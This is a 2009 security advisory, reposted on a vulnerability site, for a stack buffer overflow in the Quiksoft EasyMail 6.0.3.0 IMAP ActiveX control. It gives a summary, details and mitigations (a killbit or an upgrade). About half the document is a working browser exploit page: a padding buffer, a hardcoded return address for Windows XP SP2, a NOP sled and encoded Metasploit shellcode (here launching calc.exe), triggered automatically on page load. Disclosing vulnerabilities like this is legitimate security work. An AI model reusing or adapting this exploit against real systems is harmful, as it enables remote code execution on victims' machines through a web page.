SecurityvulnsSECURITYVULNS:DOC:22478Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack overflow exploit
<!–
I - TITLE
Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX
stack overflow exploit
II - SUMMARY
Description: Remotely exploitable buffer overflow in ActiveX component
Quiksoft EasyMail 6.0.3.0 allows for the arbitrary code execution in the
user context.
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),
http://www.devtarget.org
Date: September 17th, 2009
Severity: Medium (remote code execution in the user context)
References: http://www.devtarget.org/easymail-advisory-09-2009.txt
III - OVERVIEW
Quote from quiksoft.com: "The EasyMail Products are relied upon by over
thousands
of international corporations, federal, state and local organizations,
and individual
developers. Quiksoft has established the EasyMail products as "the
professional,
reliable, and easy to use choice for e-mail development". More
information about
the product can be found online at http://www.quiksoft.com.
IV - DETAILS
The software Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX
component
to facilitate the development of IMAP4-aware applications. The connect()
function
of this component is prone to a classic buffer overflow vulnerability
when a
particularly long argument is passed and the application attempts to
copy that
data into a finite buffer. This allows for the execution of arbitrary
code in the
user context.
V - MITIGATING MEASURES
Either set the killbit for the relevant ActiveX component
(clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D)
or install the latest version of Quiksoft EasyMail which is not
considered vulnerable.
VI - NOTES
Code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis
Provencher
for drawing my attention on Quiksoft EasyMail. Shellcode below is rather
harmless and
executes calc.exe.
Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0
–>
<html>
<head>
<title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>
<script language="JavaScript" defer>
function Check() {
var buf = 'A';
while (buf.length <= 440) buf = buf + 'A';
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378
Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
"%4e%31%75%74%38%70%65%77%70%43");
var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English
var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");
var m = buf + eip + nop + shellcode1 + nop;
obj.connect(m);
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
Failed to instantiate object.
</object>
</body>
</html>